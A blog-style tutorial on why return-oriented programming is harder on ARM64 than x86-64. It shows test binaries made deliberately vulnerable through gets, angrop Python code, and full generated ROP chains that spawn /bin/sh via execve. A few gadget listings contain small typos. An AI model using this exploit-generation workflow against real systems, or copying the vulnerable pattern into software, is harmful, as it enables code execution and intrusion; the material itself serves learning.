Return-oriented programming (ROP) is fairly trivial for architectures like x86-64 with stack-based returns which transfer control to a return address located on the stack. However, on ARM64, software can't write directly to the program counter. It can only be updated through branches and exception entries or returns. This makes stack-based returns in the x86-64 sense impossible.
Naturally, this key architectural difference means that the structure of ROP chains differs between x86-64 and ARM64. It also affects the practicality of manually crafting such chains. Instead, it naturally lends itself to using ROP chain generators.
On x86-64, typical ROP gadgets end with a ret
instruction which pops the value from the top of the stack
specified by rsp into the program counter
rip. This makes gadget chaining easy since the stack
pointer, which functions as a quasi program counter, is
automatically advanced to the next gadget on the stack.
Below is a hypothetical stack view of an x86-64 ROP chain that
writes 0xdeadbeef to rdi and
0xfeedface to rsi:
0x0000000000000000: pop, %rdi; ret 0x0000000000000008: 0xdeadbeef 0x0000000000000010: pop, %rsi; ret 0x0000000000000018: 0xfeedfaceHere's how the ROP chain executes:
0x8.pop, %rdi pops 0xdeadbeef into
rdi. Now the stack pointer is at
0x10.ret transfers control to the address at
0x10. Now the stack pointer is at
0x18.pop, %rsi pops 0xfeedface into
rsi. Now the stack pointer is at
0x20.ret transfers control to the address at
0x20. Now the stack pointer is at
0x28On architectures with stack-based returns, ROP chains automatically chain themselves together since the return instruction transfers control to the next gadget on the stack. You just place all your gadgets on the stack, padding where necessary and they execute in that order.
ARM64 has a ret instruction too. However, instead
of writing directly to the program counter pc, it
branches to the link register lr. Simple gadgets
still end with a ret instruction, however, you have
to advance to the next gadget manually by setting lr
in the gadget. Since ret is really just a branch,
you can substitute it with any branch instruction as long as you
control the destination.
Below is a hypothetical stack view of an ARM64 ROP chain that
writes 0xdeadbeef to x0 and
0xfeedface to x1:
0x0000000000000000: ldr x0, [sp]; ldr lr, [sp, #0x8], #0x10; ret 0x0000000000000008: 0xdeadbeef 0x0000000000000010: ldr x1, [sp]; ldr lr, [sp, #0x8], #0x10; ret 0x0000000000000018: 0xfeedface
Here's how the ROP chain executes:
0x8.ldr x0, [sp] loads 0xdeadbeef
into x0.ldr lr, [sp, #0x8], #0x10 loads the value at
0x10 into lr and adds
0x10 to the stack pointer. Now the stack pointer
is at 0x18.ret transfers control to the address in
lr.ldr x1, [sp] loads 0xfeedface
into x1.ldr lr, [sp, #0x8], #0x10 loads the value at
0x20 into lr and adds
0x10 to the stack pointer. Now the stack pointer
is at 0x28.ret transfers control to the address in
lr.Notice how the gadgets have to manually chain themselves
together. They have to get the address of the next gadget into
lr before ret is executed.
Unfortunately you'll never find gadgets like these in the wild: gadgets which perfectly advance the stack pointer up the stack. The offsets you see here for loads and stores were chosen for simplicity. Usually, you'll find that the stack offsets in loads and stores can be rather large resulting in a larger chain size due to padding.
Normally, I write ROP chains manually. This requires me
running ROPgadget
on relevant binaries and then combing through their gadgets to
build up a chain. This works fine for architectures where you're
likely to find simple gadgets with no side effects or
dependencies. However, these sort of gadgets rarely exist in
ARM64 binaries.
Take the glibc on my system for example, a supposed trove of
gadgets. On x86-64, say you wanted to set rdi to a
value. That's no problem, pop rdi; ret exists. Want
to set rsi too? pop rsi; ret exists. On
ARM64, say you want to set x0 to a value. Well you
have ldr x0, [sp, #0x10]; ldp fp, lr, [sp], #0x20;
ret. But then say you want to set x1 too. Now
the gadgets become more constrained. ldr x1, [sp, #0x20];
add sp, sp, #0xb0; br x16 was literally the nicest gadget
I could find. However, it requires you to control
x16 to continue your chain. So that's yet another
gadget you'll have to find. And what if that gadget requires you
to control a different register? The dependencies just keep on
growing.
I wondered if there was a better way to write ROP chains,
something more automated. Like was there an angr but for ROP?
A tool where I could say "here are a a set of gadgets, now find
the sequence of gadgets which result in this state". Well it
turns out that that exact tool exists: angrop.
angrop's made by the same great people who made
angr. It's built on top of angr's
symbolic execution engine, and uses constraint solving for
generating ROP chains. Most importantly, it understands the
effects of gadgets.
I wrote a test programs for x86-64 and ARM64 to test
angrop's ROP chain generation. Each test program was
statically linked with glibc and had a vulnerable function
vuln which called gets with the current
stack frame's base as its argument. I wanted to see if I could
generate a ROP chain which would write "/bin/sh" to
writable memory, and make an execve system call to
it. It's important to note that while the test programs are
statically linked with glibc, they don't include all of glibc's
gadgets. Nevertheless, there'll still be more than enough to play
with.
Here's the architecture-independent program:
extern void vuln(); int main() { vuln(); }
Here's the x86-64 vulnerable function:
.global vuln .type vuln, @function vuln: push %rbp mov %rsp, %rbp mov %rbp, %rdi call gets pop %rbp ret .size vuln, .-vuln
And here's the ARM64 vulnerable function:
.global vuln .type vuln, @function vuln: stp fp, lr, [sp, #-16]! mov x0, sp bl gets ldp fp, lr, [sp], #16 ret .size vuln, .-vuln
Each program using angrop typically begins with
the following:
import angr, angrop p = angr.Project("pathname") rop = p.analyses.ROP()
Similar to using angr, the first step is to load
a binary into a project. Then, to use angrop, you
need to instantiate an angrop.ROP object for gadget
finding.
Currently angrop is aware of no gadgets. You can
either search for them in the binary or import them. You'll need
to search for them in the binary at least once. However, since
searching takes a bit of time and there's no gadget cache, you'll
also want to save the gadgets:
rop.find_gadgets() rop.save_gadgets("gadgets")
Now on subsequent runs, you can replace the above lines with:
rop.load_gadgets("gadgets")
With these gadgets you can construct a ROP chain using
angr's symbolic execution engine.
angrop provides helper functions which among other
things can set registers, call functions, and write to
memory.
Here's how you'd create the x86-64 ROP chain:
obj = p.loader.main_object segment = next(s for s in obj.segments if s.is_writable) syscall_gadget = next(g for g in rop.syscall_gadgets if g.dstr() == "syscall ; ret ") chain = rop.write_to_mem(segment.vaddr, b"/bin/sh\x00") chain += rop.set_regs(rax=59, rdi=segment.vaddr, rsi=0, rdx=0) chain.add_gadget(syscall_gadget)
And here's how you'd create the ARM64 ROP chain:
obj = p.loader.main_object segment = next(s for s in obj.segments if s.is_writable) syscall_gadget = next(g for g in rop.syscall_gadgets if g.dstr() == "svc #0; ret ") chain = rop.write_to_mem(segment.vaddr, b"/bin/sh\x00") chain += rop.set_regs(x8=221, x0=segment.vaddr, x1=0, x2=0) chain.add_gadget(syscall_gadget)
The above ROP chain generation code will only work if there
are sufficient gadgets to satisfy the ROP chain's constraints.
This is purely dependent on the gadget the ROP gadget finder
finds. The gadget finder class angrop.ROP accepts
several arguments in its constructor to configure the search
criteria. I found that the defaults worked perfectly for x86-64.
However, that wasn't the case with ARM64.
I had to change the instantiation to:
rop = p.analyses.ROP(fast_mode=False, max_block_size=64)
The issue was caused by the default value of the
max_block_size argument which controls the maximum
gadget length in bytes. For x86-64 the default size is 12. This
is fine since x86-64 gadgets aren't typically long and x86-64 has
variable length instructions. For ARM64, the default size is 40.
With a fixed instruction length of 4 bytes, this means a gadget
can contain at must 10 instructions. This may seem like enough,
but as you've seen, ARM64 gadgets aren't pretty: they can be
long. And in glibc, long they are.
I noticed that the gadget finder wasn't able to set
x0 even though such a gadget existed. However, said
gadget was over 10 instructions long! I found that setting the
value to 64 to allow up to 16 instructions was a more reasonable
value that found better, yet more complicated gadgets. I also
found that I had to set fast_mode to false to
prevent max_block_size from being overridden. The
only trade-off of a larger maximum block size was search speed
but that's fine since you only have to search once.
In the end, for both architectures, angrop was
able to successfully generate a ROP chains to pop a shell.
Here's the generated x86-64 ROP chain:
0x0000000000000000: pop %rdi; ret 0x0000000000000008: 0x497f68 0x0000000000000010: pop %rsi; add $0x9340, %eax; ret 0x0000000000000018: 0x68732f6e69622f 0x0000000000000020: mov %rsi, 0x98(%rdi), rsi; ret 0x0000000000000028: pop %rdi; ret 0x0000000000000030: 0x498000 0x0000000000000038: pop %rsi; ret 0x0000000000000040: 0x0 0x0000000000000048: pop %rax; pop %rdx; pop %rbx; ret 0x0000000000000050: 0x3b 0x0000000000000058: 0x0 0x0000000000000060: 0x0 0x0000000000000060: syscall; ret
And here's the ARM64 ROP chain:
0x0000000000000000: ldr x2, [sp, #0x18]; ldp fp, lr, [sp], #0x20; add x0, x0, x2; ret 0x0000000000000008: 0x0 0x0000000000000010: ldr x3, [sp, #0x10]; mov x0, x3; ldp fp, lr, [sp], #0x40; ret 0x0000000000000018: 0x0 0x0000000000000020: 0x48ffd0 0x0000000000000028: 0x0 0x0000000000000030: str x0, [x2, #0lr]; mov w0, #0; ldp fp, lr, [sp], #0x20; ret 0x0000000000000038: 0x68732f6e69622f 0x0000000000000040: 0x0 0x0000000000000048: 0x0 0x0000000000000050: 0x0 0x0000000000000058: 0x0 0x0000000000000060: 0x0 0x0000000000000068: 0x0 0x0000000000000070: ldr x2, [sp, #0x18]; ldp fp, lr, [sp], #0x20; mov x0, x2; ret 0x0000000000000078: 0x0 0x0000000000000080: 0x0 0x0000000000000088: 0x0 0x0000000000000090: mov x16, x0; ldp q0, q1, [sp, #0x50]; ldp q2, q3, [sp, #0x70]; ldp q4, q5, [sp, #0x90]; ldp q6, q7, [sp, #0xb0]; ldp x0, x1, [sp, #0x40]; ldp x2, x3, [sp, #0lr]; ldp x4, x5, [sp, #0x20]; ldp x6, x7, [sp, #0x10]; ldp x8, x9, [sp], #0xd0; ldp x17, lr, [sp], #0x10; br x16 0x0000000000000098: 0x0 0x00000000000000a0: svc #0; ret 0x00000000000000a8: 0xdd 0x00000000000000b0: 0x0 0x00000000000000b8: 0x0 0x00000000000000c0: 0x0 0x00000000000000c8: 0x0 0x00000000000000d0: 0x0 0x00000000000000d8: 0x0 0x00000000000000e0: 0x0 0x00000000000000e8: 0x490000 0x00000000000000f0: 0x0 0x00000000000000f8: 0x0 0x0000000000000100: 0x0 0x0000000000000108: 0x0 0x0000000000000110: 0x0 0x0000000000000118: 0x0 0x0000000000000120: 0x0 0x0000000000000128: 0x0 0x0000000000000130: 0x0 0x0000000000000138: 0x0 0x0000000000000140: 0x0 0x0000000000000148: 0x0 0x0000000000000150: 0x0 0x0000000000000158: 0x0 0x0000000000000160: 0x0 0x0000000000000168: 0x0 0x0000000000000170: 0x0 0x0000000000000178: 0x0 0x0000000000000180: 0x0
Both are impressive, but I was far more impressed by the ARM64
chain. It's faster to just throw it at the binary than attempting
to statically analyze it. I mean, just look at the mammoth gadget
at 0x90! It's like looking at the output of a
compiler. Some things just aren't immediately clear at all. But
the compiler, or in this case angrop, can see right
through it.
I've come to the conclusion that practical ROP is just harder on ARM64 than on x86-64. Now I'm no ROP historian, but maybe the technique was first discovered on an architecture with stack-based returns. I don't know, a part of me just feels like it was made for the x86 architecture family.
So, if you're ever knee-deep in crafting an x86-64 ROP chain
and things are getting a bit hairy, just remember that it could
be worse. Instead, you could be knee-deep crafting an ARM64 ROP
chain without angrop.